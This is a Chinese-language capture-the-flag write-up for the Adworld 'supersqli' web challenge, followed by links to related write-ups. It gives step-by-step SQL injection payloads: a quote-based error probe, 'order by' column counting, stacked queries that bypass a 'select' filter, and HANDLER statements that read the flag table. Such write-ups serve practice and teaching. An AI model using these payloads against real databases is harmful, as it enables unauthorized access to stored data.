攻防世界---web---supersqli

简介: 攻防世界---web---supersqli

1、题目描述

2、判断注入点,这里输入1'报错了,说明存在注入点

3、查看列数,根据结果显示可知,有2列

1' order by 1#

1' order by 3#

4、查看数据库名,这里发现select被过滤了

1' union select 1,databases();#

5、这里可以使用堆叠绕过(以分号来隔开每一次的sql语句的查询),查数据库名,再结合题目的提示可知,我们要找的信息在"supersqli"这个数据库中。

1';show databases;#

6、查询"supersqli"数据库中的表名,使用下面的方法,查到了两张表。

1';use supersqli;show tables;#

7、查询字段,由于表名是字符串,所以需要用``反引号。

1';use supersqli;show columns from `1919810931114514`;#

8、看到了flag字段,接着查询flag字段里面的信息。打开名为 1919810931114514 的表,并将其命名为 p,读取p表的第一行数据


1';use supersqli;handler `1919810931114514` open as p;handler p read first;#

相关文章
|
1月前
攻防世界12-baby_web
攻防世界12-baby_web
攻防世界---baby_web
攻防世界---baby_web
|
1月前
|
数据安全/隐私保护
攻防世界web-----easyupload
攻防世界web-----easyupload
|
1月前
|
Go PHP
攻防世界web---fileinclude
攻防世界web---fileinclude
攻防世界---web---warmup
攻防世界---web---warmup
攻防世界---web---warmup
|
1月前
|
数据库
攻防世界---web---NewsCenter
攻防世界---web---NewsCenter
|
1月前
|
PHP
攻防世界---Web_php_include
攻防世界---Web_php_include
|
1月前
|
PHP 数据安全/隐私保护
【攻防世界】web2(逆向解密)
【攻防世界】web2(逆向解密)
|
1月前
|
安全 索引 Python
【攻防世界】Web_python_template_injection
【攻防世界】Web_python_template_injection
|
1月前
|
SQL 前端开发 Java
《CTF攻防世界web题》之茶壶我爱你(2)
《CTF攻防世界web题》之茶壶我爱你(2)
32 0